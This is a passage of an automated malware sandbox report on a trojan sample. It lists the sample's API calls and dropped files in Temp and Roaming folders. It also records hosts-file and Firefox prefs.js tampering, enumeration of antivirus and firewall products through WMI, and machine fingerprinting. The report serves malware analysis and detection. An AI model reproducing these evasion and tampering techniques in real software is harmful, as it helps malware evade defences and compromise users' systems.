Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 9_2_00007FF7A34C9868
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx, 9_2_00007FF7A34CB830
Source: C:\Windows\System32\svchost.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 9_2_00007FF7A34CD04C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 9_2_00007FF7A34CB77C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 9_2_00007FF7A34CCEF0
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 9_2_00007FF7A34CA57C
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 9_2_00007FF7A34BDD34
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 9_2_00007FF7A34C9DF4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetProcAddress,GetLocaleInfoW, 12_2_00007FF8B8303AE0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: EnumSystemLocalesW, 12_2_00007FF8B836AF64
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection, 12_2_00007FF8B8368FB8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetPrimaryLen,EnumSystemLocalesW, 12_2_00007FF8B836AFC4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetPrimaryLen,EnumSystemLocalesW, 12_2_00007FF8B836B074
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_00007FF8B836B4B8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 12_2_00007FF8B836B62C
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 13_2_00007FF67F569868
Source: C:\Windows\System32\svchost.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 13_2_00007FF67F56D04C
Source: C:\Windows\System32\svchost.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 13_2_00007FF67F56B934
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 13_2_00007FF67F56B77C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx, 13_2_00007FF67F56B830
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 13_2_00007FF67F56CEF0
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 13_2_00007FF67F56A57C
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 13_2_00007FF67F569DF4
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 13_2_00007FF67F55DD34
Source: C:\Windows\System32\svchost.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 13_2_00007FF67F56B310
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx, 13_2_00007FF67F5692F0
Source: C:\Windows\System32\svchost.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 13_2_00007FF67F5662BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\ucrtbase.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-console-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-2-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l2-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-memory-l1-1-0.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Documents\FACWLRWHGG VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Documents\JDSOXXXWOA VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Pictures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Queries volume information: C:\Users\user\Music VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF9576AC GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter, 0_2_00007FF6CF9576AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF944FD8 GetUserNameW, 0_2_00007FF6CF944FD8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 10_2_00007FF779EB518C
Source: C:\Windows\explorer.exe Code function: 3_2_11057508 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free, 3_2_11057508
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\System32\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\System32\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\System32\svchost.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: svchost.exe Binary or memory string: procexp.exe
Source: 5BB2.tmp.x.exe, 00000006.00000002.2533766437.0000000005D52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
